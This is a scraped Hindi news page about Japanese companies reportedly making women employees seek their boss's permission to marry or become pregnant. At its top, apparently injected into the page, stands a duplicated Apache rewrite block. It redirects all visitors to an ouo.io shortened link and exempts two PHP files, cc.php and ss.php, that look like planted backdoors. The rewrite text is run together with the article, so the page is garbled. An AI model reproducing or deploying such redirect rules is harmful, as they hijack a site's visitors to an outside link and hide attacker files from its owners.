
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 415
क्या आपने कभी सुना है कि किसी कंपनी ने अपनी किसी महिला कर्मचारी को इसलिए अपमानित किया हो क्योंकि वो गर्भवती हो गईं? जी हां, जापान की एक कंपनी ने एक महिला के साथ कुछ ऐसा ही किया है। कंपनी ने अपनी एक कर्मचारी को आउट ऑफ टर्न गर्भवती होने के कारण प्रताड़ित और अपमानित किया है।
केवल यही नहीं, कंपनी ने अपनी 22 और महिला कर्मचारियों को ईमेल के ज़रिए आदेश दिया है कि वो वरीयता के क्रम को भंग करके गर्भ धारण करने की गलती ना करें। कंपनी के एक कर्मचारी को 35 वर्ष की आयु तक अपनी संतान को जन्म देने के लिए इंतज़ार करना पड़ेगा। ये एक अघोषित नियम बन चुका है कि महिला कर्मचारियों को बच्चे को जन्म देने के लिए अपने बॉस से इजाज़त लेनी होगी।
जापान की कई कंपनियों ने महिला कर्मचारियों को निर्देश दिया है कि मां बनने और शादी करने से पहले वो अपने बॉस की इजाज़त लें। इसकी बड़ी अजीब वजहें भी बताई जा रही हैं।
इसके पीछे एक वजह ये बताया जा रहा है कि काम के दवाब से मौत, जो कि यहां आम बात है। गलत होने के बावजूद इस नियम को औरतों के हक में बताया जा रहा है। तर्क दिया जा रहा है काम और बच्चे की ज़िम्मेदारी का दोहरा दवाब महिलाओं के लिए ख़तरनाक हो सकता है। ये नियम उनको इस तकलीफ से बचा सकता है।